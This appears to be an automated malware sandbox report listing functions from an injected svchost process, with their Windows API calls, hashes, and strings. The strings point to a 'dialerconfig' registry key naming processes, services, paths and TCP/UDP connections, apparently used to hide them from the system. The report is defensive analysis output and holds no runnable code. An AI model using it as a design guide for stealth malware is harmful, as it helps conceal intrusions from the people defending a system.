Part of subcall function 0000016C21161EB4: GetCurrentThread.KERNEL32 ref: 0000016C21161EBF

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: c670110d79c115e19f884479ef144f889e3b3d9098271a59c1f83876c6625d83
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 00113C7D63468141F7219725AD2A7FA6290B7F4307F54001D9FEA89A94EF3BC0C586D0

Function 0000016C2116D130 Relevance: 3.1, APIs: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0000016C2116D149
FreeEnvironmentStringsW.KERNEL32 ref: 0000016C2116D20D

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
Instruction ID: 56c88e1f27c5e69a91e5fc11674a148bbff9665defafe7eb40423a2fbe6f01a7
Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
Instruction Fuzzy Hash: 48218535B147D081EA209F176C102AAA6A4F7E4BD1F484129DFD963FD4DF7BC4928380

Function 0000016C21161C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000016C21161650: GetProcessHeap.KERNEL32 ref: 0000016C2116165B
Part of subcall function 0000016C21161650: HeapAlloc.KERNEL32 ref: 0000016C2116166A
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211616DA
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C21161707
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161721
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C21161741
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C2116175C
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C2116177C
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161797
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211617B7
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C211617D2
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211617F2

Sleep.KERNEL32 ref: 0000016C21161C43
SleepEx.KERNELBASE ref: 0000016C21161C49

Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C2116180D
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C2116182D
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161848
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C21161868
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C21161883
Part of subcall function 0000016C21161650: RegOpenKeyExW.ADVAPI32 ref: 0000016C211618A3
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C211618BE
Part of subcall function 0000016C21161650: RegCloseKey.ADVAPI32 ref: 0000016C211618C8

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 25e5ff9fc54f8806c5b9a58355ab4f0658ee015b650a5c7161e1393e7ca698c5
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: BF31EC7DA0068191EB50AF26DE653FE1294A7F4BD3F1440298F8987A95DE33C8D082D0

Function 0000016C21163930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000016C21163948

Strings

dialer, xrefs: 0000016C21163941

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 230a53cb4240d8ead6065b66432fd98b6d01c3fd884062731801f27733af343c
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: BBD05E3836124B86EB149FA19CA12B22350ABA4716F4880288F5502A94E72AC9CECA50

Function 0000016C21132908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000016C21132A31

Memory Dump Source

Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 48df7943838d973feb0a730a1a0509e7f90eadfe302c5dc4d71423d429a5b180
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: F86112367016D087EA6CDF1598607BCB391FBA4B95F148019DF9907B88DA39D893C740

Function 0000016C211CB860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 0000016C211CB8B5

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: f278b5c8437950f7670d114c9856fe1f3689ac53576ff95283a93907405a7eed
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: BAF04FBC71270548FE655B615C313F612806FE4782F1844288F8AE6AC1DA3EC4C44296

Function 0000016C2116B860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 0000016C2116B8B5

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: bf042cafed8894682b5b61f49a49779834435a07309af86f7596f17dd5ae5566
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 68F0496830268549FE65AB669C203F502886FF4B42F1854388F8A87BC1EB3FC4C54298

Non-executed Functions

Function 0000016C211C2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000016C211C2D80
lstrlenW.KERNEL32 ref: 0000016C211C2FBA

Part of subcall function 0000016C211C1A14: OpenProcess.KERNEL32 ref: 0000016C211C1A3A
Part of subcall function 0000016C211C1A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000016C211C1A58
Part of subcall function 0000016C211C1A14: PathFindFileNameW.SHLWAPI ref: 0000016C211C1A67
Part of subcall function 0000016C211C1A14: lstrlenW.KERNEL32 ref: 0000016C211C1A73
Part of subcall function 0000016C211C1A14: StrCpyW.SHLWAPI ref: 0000016C211C1A86
Part of subcall function 0000016C211C1A14: CloseHandle.KERNEL32 ref: 0000016C211C1A94

GetProcAddress.KERNEL32 ref: 0000016C211C2D95

Part of subcall function 0000016C211C1554: StrCmpIW.SHLWAPI ref: 0000016C211C1585

Part of subcall function 0000016C211C3930: StrCmpNIW.SHLWAPI ref: 0000016C211C3948

StrCmpNIW.SHLWAPI ref: 0000016C211C2DD8
lstrlenW.KERNEL32 ref: 0000016C211C2F00

Strings

NtQueryObject, xrefs: 0000016C211C2D8B
\Device\Nsi, xrefs: 0000016C211C2DCB
ntdll.dll, xrefs: 0000016C211C2D79

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: ec41fbd1c173e4c5d78fe47847e12f8d5f7be49cf8077980a5447e00c36ff842
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 6DB1917A22079582EB599F25C8607FA63A4F7A4F86F14501ADF8963F94DF36C8C0C781

Function 0000016C21162CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000016C21162D80
lstrlenW.KERNEL32 ref: 0000016C21162FBA

Part of subcall function 0000016C21161A14: OpenProcess.KERNEL32 ref: 0000016C21161A3A
Part of subcall function 0000016C21161A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000016C21161A58
Part of subcall function 0000016C21161A14: PathFindFileNameW.SHLWAPI ref: 0000016C21161A67
Part of subcall function 0000016C21161A14: lstrlenW.KERNEL32 ref: 0000016C21161A73
Part of subcall function 0000016C21161A14: StrCpyW.SHLWAPI ref: 0000016C21161A86
Part of subcall function 0000016C21161A14: CloseHandle.KERNEL32 ref: 0000016C21161A94

GetProcAddress.KERNEL32 ref: 0000016C21162D95

Part of subcall function 0000016C21161554: StrCmpIW.SHLWAPI ref: 0000016C21161585

Part of subcall function 0000016C21163930: StrCmpNIW.SHLWAPI ref: 0000016C21163948

StrCmpNIW.SHLWAPI ref: 0000016C21162DD8
lstrlenW.KERNEL32 ref: 0000016C21162F00

Strings

NtQueryObject, xrefs: 0000016C21162D8B
\Device\Nsi, xrefs: 0000016C21162DCB
ntdll.dll, xrefs: 0000016C21162D79

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: c25c6903b18604247aa998f6dfb932b9c16f7968d24fd35738e45ecd6bb27cdb
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 05B15B3A22169081EB598F25DD607FA73A4F7A4B86F54501AEF8957F94DB37C8C1C380

Function 0000016C211C7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000016C211C7E8C
RtlCaptureContext.NTDLL ref: 0000016C211C7EB9
RtlLookupFunctionEntry.NTDLL ref: 0000016C211C7ED3
RtlVirtualUnwind.NTDLL ref: 0000016C211C7F14
IsDebuggerPresent.KERNEL32 ref: 0000016C211C7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000016C211C7F89
UnhandledExceptionFilter.KERNEL32 ref: 0000016C211C7F94

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 81f89bdae6f822c9869372a08e957f248fa24451829395cb080722d84ae174de
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 8A315E7A214B8096EB609F60ECA03EE7360F794745F44442ADF8E57B98EF79C588CB50

Function 0000016C21167E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000016C21167E8C
RtlCaptureContext.NTDLL ref: 0000016C21167EB9
RtlLookupFunctionEntry.NTDLL ref: 0000016C21167ED3
RtlVirtualUnwind.NTDLL ref: 0000016C21167F14
IsDebuggerPresent.KERNEL32 ref: 0000016C21167F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000016C21167F89
UnhandledExceptionFilter.KERNEL32 ref: 0000016C21167F94

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 264e9ea3838fd8524de9637e4cffaaa99a35a9bafdb9f78695b4dc9d211d3e1a
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 97315E76214B8086EB609F60EC607EE73A0F7A4745F44442ADF8D47B98EF3AC589C750

Function 0000016C211CB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000016C211CB585
RtlLookupFunctionEntry.NTDLL ref: 0000016C211CB59D
RtlVirtualUnwind.NTDLL ref: 0000016C211CB5D8
IsDebuggerPresent.KERNEL32 ref: 0000016C211CB611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000016C211CB61B
UnhandledExceptionFilter.KERNEL32 ref: 0000016C211CB626

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 705bf76ff624321999bfa1bb59edd8a3a35922981169caafb23c140a560b3798
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 7931393A214B8096DB60CB25E8503EE73A4F798795F50012AEF9D52B94DF39C585CB40

Function 0000016C2116B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000016C2116B585
RtlLookupFunctionEntry.NTDLL ref: 0000016C2116B59D
RtlVirtualUnwind.NTDLL ref: 0000016C2116B5D8
IsDebuggerPresent.KERNEL32 ref: 0000016C2116B611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000016C2116B61B
UnhandledExceptionFilter.KERNEL32 ref: 0000016C2116B626

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 7094580ebbedd9afd61a534ee597722aebcf73b087f2fb8e064fbcc1226bfce0
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: DB312A3A214B8086DB608F25E8503EE73A4F7A9795F54012AEF9D47B94DF3AC586CB40

Function 0000016C211CFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000016C211CFF67
WriteFile.KERNEL32 ref: 0000016C211D021E
WriteFile.KERNEL32 ref: 0000016C211D0270
GetLastError.KERNEL32 ref: 0000016C211D0372
GetLastError.KERNEL32 ref: 0000016C211D03D2

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 6f913e93f5d48379b5d36f015813af264e6fb4329d58b97750b15f176ecbebd8
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 70E1143A724B809AEB00CF64D8502EE7BB1F3957C9F10411ADF8A57F99DA39C596C780

Function 0000016C2116FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000016C2116FF67
WriteFile.KERNEL32 ref: 0000016C2117021E
WriteFile.KERNEL32 ref: 0000016C21170270
GetLastError.KERNEL32 ref: 0000016C21170372
GetLastError.KERNEL32 ref: 0000016C211703D2

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: d0a5a59f048ed87dd58a075fba967e5e3d3b94f526c38f774114693f182d7af0
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 56E1E136718B808AE700CF64D8602EE7BB1F396789F14411ADF8A57F99DB36C596C780

Function 0000016C211C1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000016C211C165B
HeapAlloc.KERNEL32 ref: 0000016C211C166A

Part of subcall function 0000016C211C1274: GetProcessHeap.KERNEL32 ref: 0000016C211C127A
Part of subcall function 0000016C211C1274: HeapAlloc.KERNEL32 ref: 0000016C211C1289
Part of subcall function 0000016C211C1274: GetProcessHeap.KERNEL32 ref: 0000016C211C12A3
Part of subcall function 0000016C211C1274: HeapAlloc.KERNEL32 ref: 0000016C211C12B4

RegOpenKeyExW.ADVAPI32 ref: 0000016C211C16DA
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C1707
RegCloseKey.ADVAPI32 ref: 0000016C211C1721
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C1741
RegCloseKey.ADVAPI32 ref: 0000016C211C175C
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C177C
RegCloseKey.ADVAPI32 ref: 0000016C211C1797
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C17B7
RegCloseKey.ADVAPI32 ref: 0000016C211C17D2
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C17F2
RegCloseKey.ADVAPI32 ref: 0000016C211C180D
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C182D
RegCloseKey.ADVAPI32 ref: 0000016C211C1848
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C1868
RegCloseKey.ADVAPI32 ref: 0000016C211C1883
RegOpenKeyExW.ADVAPI32 ref: 0000016C211C18A3
RegCloseKey.ADVAPI32 ref: 0000016C211C18BE
RegCloseKey.ADVAPI32 ref: 0000016C211C18C8

Part of subcall function 0000016C211C12C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000016C211C1326
Part of subcall function 0000016C211C12C8: GetProcessHeap.KERNEL32 ref: 0000016C211C1334
Part of subcall function 0000016C211C12C8: HeapAlloc.KERNEL32 ref: 0000016C211C1345
Part of subcall function 0000016C211C12C8: RegEnumValueW.ADVAPI32 ref: 0000016C211C13A1
Part of subcall function 0000016C211C12C8: GetProcessHeap.KERNEL32 ref: 0000016C211C13E9
Part of subcall function 0000016C211C12C8: HeapAlloc.KERNEL32 ref: 0000016C211C13F7
Part of subcall function 0000016C211C12C8: GetProcessHeap.KERNEL32 ref: 0000016C211C141B
Part of subcall function 0000016C211C12C8: HeapFree.KERNEL32 ref: 0000016C211C1429
Part of subcall function 0000016C211C12C8: lstrlenW.KERNEL32 ref: 0000016C211C1432
Part of subcall function 0000016C211C12C8: GetProcessHeap.KERNEL32 ref: 0000016C211C1440
Part of subcall function 0000016C211C12C8: HeapAlloc.KERNEL32 ref: 0000016C211C144E

Strings

tcp_remote, xrefs: 0000016C211C1861
udp, xrefs: 0000016C211C189C
service_names, xrefs: 0000016C211C17EB
tcp_local, xrefs: 0000016C211C1826
process_names, xrefs: 0000016C211C1775
pid, xrefs: 0000016C211C173A
SOFTWARE\dialerconfig, xrefs: 0000016C211C16BA
paths, xrefs: 0000016C211C17B0
startup, xrefs: 0000016C211C16FD

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 94c3d14fc300cb82dc38e92c8f5b15372d93f8eb11a0fdc8245e550fa48adbf2
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 8B71F87E320B50C5EB109F65EC606EA67A4F7E4B8AF405119DF8D57A68DF3AC494C380

Function 0000016C21161650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000016C2116165B
HeapAlloc.KERNEL32 ref: 0000016C2116166A

Part of subcall function 0000016C21161274: GetProcessHeap.KERNEL32 ref: 0000016C2116127A
Part of subcall function 0000016C21161274: HeapAlloc.KERNEL32 ref: 0000016C21161289
Part of subcall function 0000016C21161274: GetProcessHeap.KERNEL32 ref: 0000016C211612A3
Part of subcall function 0000016C21161274: HeapAlloc.KERNEL32 ref: 0000016C211612B4

RegOpenKeyExW.ADVAPI32 ref: 0000016C211616DA
RegOpenKeyExW.ADVAPI32 ref: 0000016C21161707
RegCloseKey.ADVAPI32 ref: 0000016C21161721
RegOpenKeyExW.ADVAPI32 ref: 0000016C21161741
RegCloseKey.ADVAPI32 ref: 0000016C2116175C
RegOpenKeyExW.ADVAPI32 ref: 0000016C2116177C
RegCloseKey.ADVAPI32 ref: 0000016C21161797
RegOpenKeyExW.ADVAPI32 ref: 0000016C211617B7
RegCloseKey.ADVAPI32 ref: 0000016C211617D2
RegOpenKeyExW.ADVAPI32 ref: 0000016C211617F2
RegCloseKey.ADVAPI32 ref: 0000016C2116180D
RegOpenKeyExW.ADVAPI32 ref: 0000016C2116182D
RegCloseKey.ADVAPI32 ref: 0000016C21161848
RegOpenKeyExW.ADVAPI32 ref: 0000016C21161868
RegCloseKey.ADVAPI32 ref: 0000016C21161883
RegOpenKeyExW.ADVAPI32 ref: 0000016C211618A3
RegCloseKey.ADVAPI32 ref: 0000016C211618BE
RegCloseKey.ADVAPI32 ref: 0000016C211618C8

Part of subcall function 0000016C211612C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000016C21161326
Part of subcall function 0000016C211612C8: GetProcessHeap.KERNEL32 ref: 0000016C21161334
Part of subcall function 0000016C211612C8: HeapAlloc.KERNEL32 ref: 0000016C21161345
Part of subcall function 0000016C211612C8: RegEnumValueW.ADVAPI32 ref: 0000016C211613A1
Part of subcall function 0000016C211612C8: GetProcessHeap.KERNEL32 ref: 0000016C211613E9
Part of subcall function 0000016C211612C8: HeapAlloc.KERNEL32 ref: 0000016C211613F7
Part of subcall function 0000016C211612C8: GetProcessHeap.KERNEL32 ref: 0000016C2116141B
Part of subcall function 0000016C211612C8: HeapFree.KERNEL32 ref: 0000016C21161429
Part of subcall function 0000016C211612C8: lstrlenW.KERNEL32 ref: 0000016C21161432
Part of subcall function 0000016C211612C8: GetProcessHeap.KERNEL32 ref: 0000016C21161440
Part of subcall function 0000016C211612C8: HeapAlloc.KERNEL32 ref: 0000016C2116144E

Strings

tcp_local, xrefs: 0000016C21161826
process_names, xrefs: 0000016C21161775
paths, xrefs: 0000016C211617B0
tcp_remote, xrefs: 0000016C21161861
service_names, xrefs: 0000016C211617EB
pid, xrefs: 0000016C2116173A
udp, xrefs: 0000016C2116189C
startup, xrefs: 0000016C211616FD
SOFTWARE\dialerconfig, xrefs: 0000016C211616BA

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 0b136447f94d6e826ee1d2813973f9d15c31740d21398d34408adc4a2faa0209
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: C1710C3A710A5085EB109F65EC606E967B4F7E4B8AF405119DF8D57F68DF3AC485C380

Function 0000016C211C12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000016C211C1326
GetProcessHeap.KERNEL32 ref: 0000016C211C1334
HeapAlloc.KERNEL32 ref: 0000016C211C1345
RegEnumValueW.ADVAPI32 ref: 0000016C211C13A1

Part of subcall function 0000016C211C1554: StrCmpIW.SHLWAPI ref: 0000016C211C1585

GetProcessHeap.KERNEL32 ref: 0000016C211C13E9
HeapAlloc.KERNEL32 ref: 0000016C211C13F7
GetProcessHeap.KERNEL32 ref: 0000016C211C141B
HeapFree.KERNEL32 ref: 0000016C211C1429
